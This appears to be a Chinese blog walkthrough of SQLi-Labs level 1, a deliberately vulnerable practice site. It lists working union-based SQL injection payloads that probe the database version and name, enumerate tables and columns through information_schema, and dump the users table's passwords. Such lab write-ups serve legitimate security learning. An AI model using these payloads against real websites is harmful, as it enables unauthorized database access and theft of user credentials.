SQLi-Labs SQL注入練習平臺(第一關)

        所謂SQL注入，就是經過把SQL命令插入到Web表單提交或輸入域名或頁面請求的查詢字符串，最終達到欺騙服務器執行惡意的SQL命令。具體來講，它是利用現有應用程序，將（惡意的）SQL命令注入到後臺數據庫引擎執行的能力，它能夠經過在Web表單中輸入（惡意）SQL語句獲得一個存在安全漏洞的網站上的數據庫，而不是按照設計者意圖去執行SQL語句。-----百度百科

　　我用的是看雪論壇提供的平臺：http://43.247.91.228:84/

　　通常來講習慣先加一個單引號(英文)，來判斷

　　其中%27爲單引號經過url編碼而來，其餘的編碼能夠參考百度百科的  https://baike.baidu.com/item/URL%E7%BC%96%E7%A0%81/3703727?fr=aladdin，由上圖可知加單引號報錯錯誤

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1'' LIMIT 0,1' at line 1

　　將單引號分開些，貌似能夠更好的理解

　

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '   '   1'   ' LIMIT 0,1' at line 1

　　發現單引號並無匹配，由此可知sql語句爲:

select * from users where id='$id'

　　因此咱們使用: and '1'='1 進行匹配：

　　返回正常

　　構造語句 

id=-1 ' union select 1,2,3 --+

 

id=-1 ' union select 1,version(),3 --+

　　數據庫版本

　　查看數據庫

id=-1 ' union select 1,database(),3 --+

　　查看錶

-1 'union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=0x7365637572697479 --+

查看users表

union select 1,group_concat(column_name),3 from information_schema.columns where table_name=0x7573657273

　　發現users表中有 id username password 三個字段，查看password 

-1'union select 1,password,3 from users--+

　　我的理解，可能存在錯誤。